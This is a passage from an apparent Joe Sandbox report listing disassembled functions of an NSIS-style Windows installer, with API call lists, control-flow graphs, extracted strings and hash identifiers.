                                                                                                                                                                                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                                    Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                                    Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,QuarterWalt,QuarterWalt,00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$QuarterWalt
                                                                                                                                                                                                                                                                                                    • API String ID: 4286501637-4128698268
                                                                                                                                                                                                                                                                                                    • Opcode ID: 98e1955186d6d9cc632069ee3d7f4d6f71a4f0819644fa762c3ecec58fabef84
                                                                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e1955186d6d9cc632069ee3d7f4d6f71a4f0819644fa762c3ecec58fabef84
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                                    Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 653 40337f-403398 654 4033a1-4033a9 653->654 655 40339a 653->655 656 4033b2-4033b7 654->656 657 4033ab 654->657 655->654 658 4033c7-4033d4 call 403336 656->658 659 4033b9-4033c2 call 403368 656->659 657->656 663 4033d6 658->663 664 4033de-4033e5 658->664 659->658 665 4033d8-4033d9 663->665 666 403546-403548 664->666 667 4033eb-403432 GetTickCount 664->667 670 403567-40356b 665->670 668 40354a-40354d 666->668 669 4035ac-4035af 666->669 671 403564 667->671 672 403438-403440 667->672 673 403552-40355b call 403336 668->673 674 40354f 668->674 675 4035b1 669->675 676 40356e-403574 669->676 671->670 677 403442 672->677 678 403445-403453 call 403336 672->678 673->663 686 403561 673->686 674->673 675->671 681 403576 676->681 682 403579-403587 call 403336 676->682 677->678 678->663 687 403455-40345e 678->687 681->682 682->663 690 40358d-40359f WriteFile 682->690 686->671 689 403464-403484 call 4076a0 687->689 696 403538-40353a 689->696 697 40348a-40349d GetTickCount 689->697 692 4035a1-4035a4 690->692 693 40353f-403541 690->693 692->693 695 4035a6-4035a9 692->695 693->665 695->669 696->665 698 4034e8-4034ec 697->698 699 40349f-4034a7 697->699 700 40352d-403530 698->700 701 4034ee-4034f1 698->701 702 4034a9-4034ad 699->702 703 4034af-4034e0 MulDiv wsprintfW call 404f9e 699->703 700->672 707 403536 700->707 705 403513-40351e 701->705 706 4034f3-403507 WriteFile 701->706 702->698 702->703 708 4034e5 703->708 710 403521-403525 705->710 706->693 709 403509-40350c 706->709 707->671 708->698 709->693 711 40350e-403511 709->711 710->689 712 40352b 710->712 711->710 712->671
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00426976,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                    • String ID: (]C$... %d%%$pAB$viB$y)B
                                                                                                                                                                                                                                                                                                    • API String ID: 651206458-3423946372
                                                                                                                                                                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                                    Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 713 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 716 403603-403608 713->716 717 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 713->717 718 4037e2-4037e6 716->718 725 403641 717->725 726 403728-403736 call 4032d2 717->726 728 403646-40365d 725->728 732 4037f1-4037f6 726->732 733 40373c-40373f 726->733 730 403661-403663 call 403336 728->730 731 40365f 728->731 737 403668-40366a 730->737 731->730 732->718 735 403741-403759 call 403368 call 403336 733->735 736 40376b-403795 GlobalAlloc call 403368 call 40337f 733->736 735->732 764 40375f-403765 735->764 736->732 762 403797-4037a8 736->762 740 403670-403677 737->740 741 4037e9-4037f0 call 4032d2 737->741 742 4036f3-4036f7 740->742 743 403679-40368d call 405e38 740->743 741->732 749 403701-403707 742->749 750 4036f9-403700 call 4032d2 742->750 743->749 760 40368f-403696 743->760 753 403716-403720 749->753 754 403709-403713 call 4072ad 749->754 750->749 753->728 761 403726 753->761 754->753 760->749 766 403698-40369f 760->766 761->726 767 4037b0-4037b3 762->767 768 4037aa 762->768 764->732 764->736 766->749 769 4036a1-4036a8 766->769 770 4037b6-4037be 767->770 768->767 769->749 771 4036aa-4036b1 769->771 770->770 772 4037c0-4037db SetFilePointer call 405e38 770->772 771->749 773 4036b3-4036d3 771->773 776 4037e0 772->776 773->732 775 4036d9-4036dd 773->775 777 4036e5-4036ed 775->777 778 4036df-4036e3 775->778 776->718 777->749 779 4036ef-4036f1 777->779 778->761 778->777 779->749
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
